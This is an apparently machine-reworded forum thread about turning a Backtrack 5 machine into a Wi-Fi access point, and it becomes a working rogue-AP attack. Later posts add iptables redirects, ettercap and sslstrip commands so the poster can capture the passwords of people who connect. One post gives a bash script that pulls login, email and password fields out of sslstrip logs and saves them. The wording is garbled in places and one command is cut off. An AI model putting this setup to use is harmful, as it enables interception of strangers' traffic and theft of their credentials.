Backtrack 5 as Access Point

[Dakshayani]

I marvel how I can make Backtrack 5 proceed as a point of access for wired and wifi connections. I am associated to a wireless network through PC using Backtrack 5. I desire to contribute to with other computers without network card or wireless network. My utilize will be in cooperation I tried to configure an access point, gerix wifi cracker nevertheless fake access points that do not work appropriately. And if this can be done you know how to add filters that do not permit access to Facebook and perhaps the bandwidth, so restraining?

[Zhankana_n]

I’m also facing exactly similar Difficulty. I’ve been trying to do an access point with the host but I cannot seem to get my network card in master mode. I have Following Wireless Cards.

• AWUS036H
• Atheros AR2425
• ALFA Atheros ath5k
• Alfa rtl8187

I’m unable to put together Alpha card in master mode in backtrack 5. I don’t have thought whether this card is Supported by backtrack 5 or not.

[teena_pansare]

Setup of wifi access point

Code:

# I'm using two wireless interfaces:
# Interface Chipset Driver
#
# wlan0 Broadcom b43 - [phy0]
# wlan1 Ralink RT2870/3070 rt2800usb - [phy1]
# 
# I'm connected to a wireless network with wlan0
# My wlan1 is used to create the AP (an Alfa wireless USB dongle)
# 
#install dhcp-server
apt-get install dhcp3-server 
#backup the std. configuration-file
mv /etc/dhcp3/dhcp.conf /etc/dhcp3/dhcp3.conf.backup
#create a new dhcp-conf with class C IP and /25 subnet
nano /etc/dhcp3/dhcp.conf 
#insert the following:
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
option routers 192.168.2.129;
option domain-name-servers 8.8.8.8;
range 192.168.2.130 192.168.2.140;
}
#the dhcp.conf ends here
#fire up the accesspoint 
#create monitor-mode mon0
airmon-ng start wlan1 
airbase-ng -e "AP_NAME" -c 9 mon0 
# -e for name, -c for channel, on the monitor mon0
#this will create a virtuel interface called at0 
#configuring at0 with the dhcp.conf 
ifconfig at0 up
ifconfig at0 192.168.2.129 netmask 255.255.255.128
#add a route for the traffic
route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129 
#192.168.2.128 == the netmask
#255.255.255.128 == the subnet which is /25
#192.168.2.129 == the gatway aka first avaible IP address on the network
#now point the new dhcp.conf to the dhcp3-server 
dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0
# run the following commands to flush all ip-tables and setup new ones
iptables --flush && iptables --table nat --flush && iptables --delete-chain && iptables --table nat --delete-chain && 
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE &&
iptables --append FORWARD --in-interface at0 -j ACCEPT &&
echo 1 > /proc/sys/net/ipv4/ip_forward
#I wrote it this way, so that it's easy to put into a bash-script
#WiFi AP is now setup and should work..

[Ekpah]

I used this setting and users who connect to the AP can access the Internet and I can see what happens in Wireshark.I'm trying to get access and passwords used so I searched on Google and found a very similar configuration, and uses:

Code:

iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

Code:

ettercap -T -q -p -i at0 // //
sslstrip -a -k -f

It also eliminates the # of etter.conf so it looks like this:

Code:

redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port –j

[windows_user]

in point of fact - I had the identical exact difficulty with ettercap cannot work. So what I did was to save sslstrip.log and seek the username / passwords. This was a division of the script through to smell COMAX traffic. It could be impressive like this.

Code:

#!/bin/bash
echo "Do you want to save passwords to a file? (Y=keep)"
echo "(If you want to keep it, it will be saved in /root/filename.pass.txt)"
read -e keeppd
if [[ $keeppd = "Y" || $keeppd = "y" ]] ; then # double brackets because double condition. || signifies "or"
cat /root/sslstrip.log |
awk -F "&" '!/GET/ && !/if/ !/header/ && !/^[0-9]/ && !/</ && /[PpEeUuLlCc_][A-Za-z]*=[A-Za-z0-9.%_-]*/ {if (NF >= 2) print $0}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -a -i "pwd=|pass=|passwd=|password=|textbox=|email=|user =|username=|login=|credential=|_user|_pwd=|email_a ddress=" |
awk -F "=" '{if (length($2) < 3) print "\b"; else if ($1 ~/[Pp]/) print "Password = " $2"\n"; else print "Login =", $2}' >& /root/filename.pass.txt #we do it all over again... There should be a way not to re-do that...
if [ -f "/root/filename.pass.txt" ]; then #check if it exists
echo "Passwords saved !" #it does
else echo "Error while saving passwords" #it does not
fi
else echo "Password saving skipped."
fi
rm /root/filename.txt
echo -e "\nTemporary files deleted."

[Dolsy_bendal]

I tried again to comment redir_command_off so now it looks like

Code:

#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT

Also published in etter.conf part based on a recommendation from someone (Google Search) so it now looks like this:

Code:

ec_uid = 0
ec_gid = 0

Unfortunately, the AP user loses connection after inserting.

Code:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

I even switched my test subjects (laptop and protectors) of the AP and connect again, but still could not connect to the Internet again.Here is a summary of my setup:
dhcpd.conf

Code:

ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
option routers 192.168.2.129;
option domain-name-servers 8.8.8.8;
range 192.168.2.130 192.168.2.140;
}
Code:
root@bt:~# airmon-ng start wlan1
root@bt:~# airbase-ng -e "wifi" -c 9 mon0


10:58:27  Created tap interface at0
10:58:27  Trying to set MTU on at0 to 1500
10:58:27  Trying to set MTU on mon0 to 1800
10:58:27  Access Point with BSSID 00:A0:AA:AA:AA:5A started.[/QUOTE]

root@bt:~# ifconfig at0 up
root@bt:~# ifconfig at0 192.168.2.129 netmask 255.255.255.128
root@bt:~# route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129
root@bt:~# dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0

Internet Systems Consortium DHCP Server V3.1.3
Copyright 2004-2009 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/
Wrote 2 leases to leases file.
Listening on LPF/at0/00:A0:AA:AA:AA:5A/192.168.2.128/25
Sending on   LPF/at0/00:A0:AA:AA:AA:5A/192.168.2.128/25
Sending on   Socket/fallback/fallback-net

root@bt:~# iptables --flush && iptables --table nat --flush && iptables --delete-chain && 
iptables --table nat --delete-chain && 
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE && 
iptables --append FORWARD --in-interface at0 -j ACCEPT && echo 1 > /proc/sys/net
ased on what I found on google I need to add two more lines to get etter and sslstrip working with this setup.

Enter each command separately so I can know what drops the connection. First insert
Code:
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
(The 192.168.1.1 is my home gateway)

After inserting this command my protectors and laptop can surf the Internet.
Code:

Code:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000